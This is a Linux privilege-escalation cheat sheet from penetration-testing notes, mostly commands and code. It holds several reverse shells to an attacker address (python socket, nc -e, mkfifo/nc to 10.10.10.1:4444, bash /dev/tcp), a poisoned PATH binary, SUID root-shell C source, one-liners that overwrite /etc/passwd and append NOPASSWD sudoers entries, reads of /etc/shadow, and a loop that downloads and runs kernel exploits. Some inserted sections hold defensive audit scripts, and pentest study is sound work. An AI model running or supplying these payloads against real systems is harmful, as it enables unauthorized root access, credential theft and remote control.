Linux File System
MindMap for PE
Linux elevation of privileges, manual testing
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
- Misconfigured services (cronjobs)
- any running as a privileged user?
- Incorrect file permissions (exportfs, sudo)
- Misconfigured environment ($PATH)
- Binary with SUID bit
- Software or OS with known vulnerabilities
Read http://touhidshaikh.com/blog/?p=790
If you get the error "su: must be run from a terminal", use one of the shell upgrade fixes listed on this page.
root ALL=(ALL) ALL
    The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) commands.
jelly ALL= /sbin/poweroff
    The user jelly can, from any terminal, run the command poweroff using jelly's own password.
jelly ALL = (root) NOPASSWD: /usr/bin/find
    The user jelly can, from any terminal, run the command find as the root user without a password.
Are you a sudo user already? Do you have access to powerful commands like chown or chmod?
Are you part of the sudo group, but not in the sudoers file?
What can we run with sudo?
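As an added example that is not part of the original notes, the following script audits sudoers text for the grants a reviewer would question: NOPASSWD entries, ALL-command grants to anyone but root, and commands from a small list of shell-capable binaries. The list, the finding labels and the sample sudoers text are assumptions constructed here, and the parser only handles simple one-line entries like the ones above.

```shell
# Rules are assumptions for this check, not a sudo feature: NOPASSWD grants, ALL-command
# grants to anyone but root, and grants of binaries that can spawn a shell or rewrite
# permissions (the notes name find, chmod and chown).
RISKY_BINS=" find chmod chown vi vim less more nano "

# Reads sudoers-style text on stdin and prints one finding per line.
audit_sudoers() (
    set -f                                   # no globbing when splitting command lists
    grep -vE '^[[:space:]]*(#|$)' | while IFS= read -r line; do
        user=$(printf '%s\n' "$line" | awk '{print $1}')
        case "$user" in
            Defaults*|*_Alias|root) continue ;;   # option lines, alias definitions, root itself
        esac
        case "$line" in
            *NOPASSWD:*) printf 'NOPASSWD: %s runs this grant without a password: %s\n' "$user" "$line" ;;
        esac
        # command list = everything after the last '=' or ':', minus a (runas) group
        cmds=$(printf '%s\n' "${line##*[=:]}" | sed 's/([^)]*)//; s/^[[:space:]]*//')
        IFS=,
        for cmd in $cmds; do
            cmd=$(printf '%s\n' "$cmd" | sed 's/^[[:space:]]*//; s/[[:space:]]*$//')
            base=${cmd##*/}; base=${base%% *}        # basename without arguments
            if [ "$cmd" = "ALL" ]; then
                printf 'ALL: %s may run any command: %s\n' "$user" "$line"
            elif [ "${RISKY_BINS#* $base }" != "$RISKY_BINS" ]; then
                printf 'SHELL-CAPABLE: %s may run %s, which can spawn a shell: %s\n' "$user" "$base" "$line"
            fi
        done
        unset IFS                            # back to default field splitting
    done
)

# Constructed sample: the three entries explained above plus a NOPASSWD:ALL grant.
SAMPLE_SUDOERS='# constructed sudoers sample
Defaults env_reset
root ALL=(ALL) ALL
jelly ALL= /sbin/poweroff
jelly ALL = (root) NOPASSWD: /usr/bin/find
www-data ALL=NOPASSWD:ALL'

count_sudoers_findings() {                  # number of findings for the sample
    printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers | wc -l | tr -d ' '
}
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```

On a real host, feed it `sudo -l` output or `/etc/sudoers` plus `/etc/sudoers.d/*` and treat every finding as something to justify or remove.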
Try su as all users and the username as password
User bash history
cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
grep -vE "nologin|false" /etc/passwd
Look for anything running that is not standard.
If something is listening here that did not show up in the nmap scan, a firewall rule may be blocking it. Is MySQL in there? If so, credentials will be stored somewhere on the box.
dpkg -l | awk '$1 ~ /ii/{print $2,$3}'
rpm -qa
FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep ii | awk '{print $2 " " substr($3,1)}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
Copy /tmp/packages.txt which it has created back to your machine and then run
# download this: https://github.com/rowbot1/burmatscripts/blob/master/bash/vuln_pkg_lookup.sh
./vuln_pkg_lookup.sh packages.txt
# Common locations for user installed software
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/
# Debian
dpkg -l
# CentOS, OpenSuse, Fedora, RHEL
rpm -qa
# OpenBSD, FreeBSD
pkg_info
find . -iname 'config' 2>/dev/null
Research where creds would be stored on certain webapps
What services are running as root?
Look for vulnerable/privileged components such as: mysql, sudo, udev, python
If /etc/exports is writable, you can add an NFS entry or change an existing entry to add the no_root_squash flag to a directory, put a binary with the SUID bit set on that share, and get root.
crontab -l 2>/dev/null
ls -alh /var/spool/cron 2>/dev/null
ls -al /etc/ | grep cron 2>/dev/null
ls -al /etc/cron* 2>/dev/null
cat /etc/cron* 2>/dev/null
cat /etc/at.allow 2>/dev/null
cat /etc/at.deny 2>/dev/null
cat /etc/cron.allow 2>/dev/null
cat /etc/cron.deny 2>/dev/null
cat /etc/crontab 2>/dev/null
cat /etc/anacrontab 2>/dev/null
cat /var/spool/cron/crontabs/root 2>/dev/null
If there is a cronjob that runs as root but its script has incorrect file permissions, you can change the script to run your SUID binary and get a shell.
The following command will list processes running by root, permissions and NFS exports.
echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
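The NFS and cron conditions above are the ones a defender should check for before anyone else does. As an added example, not part of the original notes, the two functions below read an exports file and a system crontab and report no_root_squash entries and root jobs whose command file is missing, relative, or writable by group or others. The file paths are parameters, the finding labels are my own, and the files they run on are constructed by make_sample_root.

```shell
# Checks for the two misconfigurations the notes describe: no_root_squash on an NFS
# export, and a cron job whose script anyone can edit. Labels and formats are assumptions.
audit_exports() {       # usage: audit_exports /etc/exports
    grep -vE '^[[:space:]]*(#|$)' "$1" | while IFS= read -r line; do
        case "$line" in
            *no_root_squash*) printf 'NO_ROOT_SQUASH: %s\n' "$line" ;;   # client root stays UID 0 on the share
        esac
    done
}

# usage: audit_crontab /etc/crontab  (system format: m h dom mon dow user command; @reboot-style lines skipped)
audit_crontab() (
    set -f                                       # '*' time fields must not glob
    grep -vE '^[[:space:]]*(#|$|@|[A-Za-z_]+=)' "$1" | while IFS= read -r line; do
        set -- $line                             # $6 = user, $7 = first word of the command
        user=$6; cmd=$7
        case "$cmd" in
            /*) ;;
            *)  printf 'RELATIVE CMD: "%s" is resolved via the cron PATH, run by %s\n' "$cmd" "$user"; continue ;;
        esac
        [ -e "$cmd" ] || { printf 'MISSING CMD: %s does not exist, run by %s\n' "$cmd" "$user"; continue; }
        perm=$(ls -lL "$cmd" | cut -c1-10)        # e.g. -rwxrwxrwx
        case "$perm" in
            ?????w*|????????w?) printf 'WRITABLE CMD: %s (%s), run by %s\n' "$cmd" "$perm" "$user" ;;
        esac
    done
)

make_sample_root() {    # constructed etc/exports, etc/crontab and two cron scripts under a temp dir
    r=$(mktemp -d)
    mkdir -p "$r/etc" "$r/opt"
    printf '/srv/share 10.0.0.0/24(rw,sync,no_root_squash)\n/srv/pub *(ro,root_squash)\n' > "$r/etc/exports"
    printf '#!/bin/sh\necho backup\n' > "$r/opt/backup.sh"; chmod 777 "$r/opt/backup.sh"
    printf '#!/bin/sh\necho ok\n' > "$r/opt/safe.sh";      chmod 755 "$r/opt/safe.sh"
    printf 'SHELL=/bin/sh\n# m h dom mon dow user command\n*/5 * * * * root %s\n0 3 * * * root %s\n17 * * * * root run-parts /etc/cron.hourly\n' \
        "$r/opt/backup.sh" "$r/opt/safe.sh" > "$r/etc/crontab"
    printf '%s\n' "$r"
}

r=$(make_sample_root)
audit_exports "$r/etc/exports"
audit_crontab "$r/etc/crontab"
rm -rf "$r"
```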
Use netstat to find other machines connected
id
su
sudo -l
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers   # who is in there? are you?
ls -alh /var/mail/
ls -ahlR /root
ls -ahlR /home/
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 {print $1}' #any other super users?
You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:
It's important to upgrade your shell, because a command may write its output to the terminal; without an upgraded shell you won't see that output (e.g. when running exploits).
Allows history commands as well as editing commands
ssh user@$ip nc $localip 4444 -e /bin/sh
# enter the user's password
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
From within IRB: exec "/bin/sh"
From within vi: :!bash  or  :set shell=/bin/bash then :shell
From within vim: :!bash
From within nmap: !sh
From within tcpdump:
echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth- -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
From busybox: /bin/busybox telnetd -l/bin/sh -p9999
# if /bin/bash has the suid bit set, note the -p option
bash -p >& /dev/tcp/$kaliip/444 0>&1
find / -name "*.txt" 2> >(grep -v 'Permission denied' >&2)
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
A SUID file runs as its owner no matter who executes it. So if root owns it, we can run it and hijack it to become root.
If you have found an interesting binary, download it to your box and open it in Ghidra. Check the main function to view the decompiled commands.
ltrace ./binary   # stepping through the binary may reveal a password if one is needed to run it
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null
find / -perm -o=x -type d 2>/dev/null
find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root
find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
In plain English, this command says to find files in the / directory owned by the user root with SUID permission bits (-perm -4000), print them, and then redirect all errors (2 = stderr) to /dev/null (where they get thrown away). The reason for this redirect is that we aren't interested in things that we can't access, and access denied errors can fill up a terminal pretty fast.
Add a binary to PATH to hijack another SUID binary that invokes it without the fully qualified path.
function /usr/bin/foo () { /usr/bin/echo "It works"; }
export -f /usr/bin/foo
/usr/bin/foo
It works
If you can get root to execute anything, the following will change a binary's owner to root and set the SUID flag:
chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;
# look for the string "password" in files under the current directory
grep -rwl "password"
ps -ef
cat /etc/services
dpkg -l
rpm -qa
An example: you see that a local database such as MySQL is running. You may be able to find credentials for it and log into it locally on the box.
If MySQL is running as root, you can run commands using the sys_exec() UDF. For instance, to add a user to sudoers:
ps -aux | grep root | grep mysql
sys_exec('usermod -a -G admin username')
More about MYSQL:
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
Alias to skip comment and empty lines in config files
alias nonempty="egrep -v '^[ \t]*#|^$'"
Find Linux distribution & version
cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;
Check versions - use in conjunction with searchsploit
dpkg -l
rpm -qa
httpd -v
mysql --version
python --version
ruby -v
cat /etc/*release
uname -m
cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
Find printers
ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archives; ls -alh /var/cache/yum/*;
find /etc/ -writable -type f 2>/dev/null
cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
/sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/networks; iptables -L; hostname; dnsdomainname
List other users home directories
ls -ahlR /root/; ls -ahlR /home/
User mails
cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
Find interesting binaries
find / -name wget 2>/dev/null; find / -name nc* 2>/dev/null; find / -name netcat* 2>/dev/null; find / -name tftp* 2>/dev/null; find / -name ftp 2>/dev/null
mount; df -h; cat /etc/fstab
If you can just change PATH, the following will add a poisoned ssh binary:
export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
chmod +x /tmp/ssh
# Ippsec demoing $PATH PE: https://www.youtube.com/watch?v=3VxZNflJqsw
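Both PATH tricks on this page (the exported shell function and the poisoned ssh binary) depend on an entry early in PATH that someone other than the binary's owner can populate. As an added example, not from the original notes, the check below reports the entries of a PATH value that make that possible; the finding labels are my own, and by default it runs against the current PATH.

```shell
# Flags PATH entries that let an unprivileged user place a binary in front of the real
# one: empty or relative entries, missing directories, and world-writable directories
# that lack the sticky bit. Symlinked entries are resolved before their mode is read.
check_path() {                 # usage: check_path "$PATH"; prints one finding per line
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r dir; do
        case "$dir" in
            "")  printf 'EMPTY entry: the current directory is searched\n'; continue ;;
            /*)  ;;
            *)   printf 'RELATIVE entry: %s\n' "$dir"; continue ;;
        esac
        if [ ! -d "$dir" ]; then
            printf 'MISSING dir: %s (whoever can create it decides what gets run)\n' "$dir"
            continue
        fi
        perm=$(ls -ldL "$dir" | cut -c1-10)     # e.g. drwxrwxrwt
        case "$perm" in
            ????????w[-x]) printf 'WORLD-WRITABLE dir without sticky bit: %s (%s)\n' "$dir" "$perm" ;;
        esac
    done
}

check_path "${1:-$PATH}"       # run against the current PATH, or one given as an argument
```

Run it against root's PATH from cron, sudo's secure_path and the login shell's PATH, since each can differ.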
Generating SUID C Shell for /bin/bash
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void){ setresuid(0, 0, 0); system("/bin/bash"); return 0; }
Without interactive shell
echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
If /etc/passwd has incorrect permissions, you can get root:
echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
or
openssl passwd
# enter a password; the output is the hash
# put this hash in place of the x in root's entry in /etc/passwd
su root   # using the password you set
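The two conditions just described (an editable /etc/passwd and a root entry with an empty or locally stored password) plus the extra-UID-0 check earlier on the page are what a defender audits for. As an added example, not from the original notes, this check reads a passwd-format file and reports them; the finding labels are my own and the sample file is constructed by make_sample_passwd.

```shell
# Reports the conditions the notes describe: a writable file, a second UID-0 account,
# an empty password field, and a hash stored in passwd rather than shadow.
audit_passwd() {                 # usage: audit_passwd /path/to/passwd
    file=$1
    perm=$(ls -lL "$file" | cut -c1-10)          # e.g. -rw-r--r--
    case "$perm" in
        ?????w*|????????w?) printf 'WRITABLE: %s is group- or world-writable (%s)\n' "$file" "$perm" ;;
    esac
    awk -F: '
        /^#/ || NF == 0 { next }
        NF != 7 { printf "MALFORMED: line %d has %d fields\n", NR, NF; next }
        $3 == 0 && $1 != "root" { printf "UID0: %s is a second root account\n", $1 }
        $2 == "" { printf "NOPASS: %s has an empty password field\n", $1 }
        $2 != "" && $2 !~ /^(x|[*]|!+)$/ { printf "HASH: %s keeps a password hash in passwd, not shadow\n", $1 }
    ' "$file"
}

make_sample_passwd() {           # constructed sample written to a temp file; prints its path
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:planted:/root:/bin/bash
jelly:$6$saltsalt$constructedhash:1000:1000:jelly:/home/jelly:/bin/bash
root2::0:0:root:/root:/bin/bash
broken:x:1001:1001:/home/broken
EOF
    chmod 666 "$f"               # deliberately world-writable so the WRITABLE rule fires
    printf '%s\n' "$f"
}

f=$(make_sample_passwd)
audit_passwd "$f"
rm -f "$f"
```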
Add user www-data to sudoers without password
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
If you can sudo chmod:
echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
gcc setuid.c -o /tmp/setuid
sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid
Wildcard injection: if there is a cron job with a wildcard in its command line, you can create a file whose name will be passed as an argument to the cron task. For more info:
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
Fix a compile error when building an exploit:
gcc 9545.c -o 9545 -Wl,--hash-style=both
Find other users on the system
id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l
grep home /etc/passwd|cut -d: -f1
echo "world-writeable folders"; find / -writable -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -222 -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -o=w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o=x -type d 2>/dev/null; echo "world-writeable & executable folders"; find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null;
Find world-writable directories without the sticky bit:
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
Find files with no owner or group:
find /dir -xdev \( -nouser -o -nogroup \) -print
Add user to sudoers in python.
#!/usr/bin/env python
import os
import sys
try:
    os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
    sys.exit()
Ring0 kernel exploit for 2.3/2.4
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0
tcpdump tcp port 80 -w output.pcap -i eth0
Creates the folder /tmp/rowbot on the target and copies the files from the kali web server into it
wget -nd -np -R "index.html*" -P /tmp/rowbot --recursive http://kali$ip
What is running, any cron jobs any scripts? Use PSPY to find out
https://github.com/DominicBreuker/pspy
Useful script to run for initial scan - displays info on box
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh
Use this tool first to help you get in the PE mindset.
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/Anon-Exploiter/SUID3NUM
The following script runs exploit suggester and automatically downloads and executes suggested exploits:
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
USAGE: xploit_installer.py <exploit id>
47: shellshock
48: heartbleed
automated kernel vulnerability enumeration and exploitation
https://github.com/spencerdodd/kernelpop
49: linux-exploit-suggester
50: unix_privesc_check
51: kernel 2.4.x / 2.6.x (sock_sendpage 1)
52: kernel 2.4 / 2.6 (sock_sendpage 2)
53: kernel < 2.6.22 (ftruncate)
54: kernel < 2.6.34 (cap_sys_admin)
55: kernel 2.6.27 < 2.6.36 (compat)
56: kernel < 2.6.36-rc1 (can bcm)
57: kernel <= 2.6.36-rc8 (rds protocol)
58: *kernel < 2.6.36.2 (half nelson)
59: *kernel <= 2.6.37 (full nelson)
60: kernel 2.6 (udev)
61: kernel 3.13 (sgid)
62: kernel 3.13.0 < 3.19 (overlayfs 1)
63: kernel 3.14.5 (libfutex)
64: kernel 2.6.39 <= 3.2.2 (mempodipper)
65: *kernel 2.6.28 / 3.0 (alpha-omega)
66: kernel 2.6.22 < 3.9 (Dirty Cow)
67: kernel 3.7.6 (msr)
68: *kernel < 3.8.9 (perf_swevent_init)
69: kernel <= 4.3.3 (overlayfs 2)
70: kernel 4.3.3 (overlayfs 3)
71: kernel 4.4.0 (af_packet)
72: kernel 4.4.x (double-fdput)
73: kernel 4.4.0-21 (netfilter)
74: *kernel 4.4.1 (refcount)
wget http://www.securitysift.com/download/linuxprivchecker.py
- Linux Kernel 2.6.39 - 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Local Privilege Escalation: CVE-2012-0056
- Linux Kernel 2.6.22 - 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method): CVE-2016-5195
- Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation: CVE-2003-0127
- Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV below 1.4.1 - Local Privilege Escalation (1): exploit/linux/local/udev_netlink
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
Other scripts:
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
Remember to run them again if you get a user shell not just www-data shell
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
./LinEnum.sh -t -r report.txt
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
wget https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl
wget https://www.rebootuser.com/?p=1758
Always read the comments in exploits: they tell you which systems and versions are vulnerable, which parts of the script need modification, and which compilation flags to use. Is $targetip 32-bit or 64-bit? Be mindful of this when compiling exploits.
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
https://www.exploit-db.com/exploits/37292
https://www.exploit-db.com/exploits/15285/
https://www.exploit-db.com/exploits/15704/
https://git.zx2c4.com/CVE-2012-0056/about/
wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
gcc -m32 -o output32 hello.c   # 32 bit
gcc -m64 -o output hello.c     # 64 bit
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "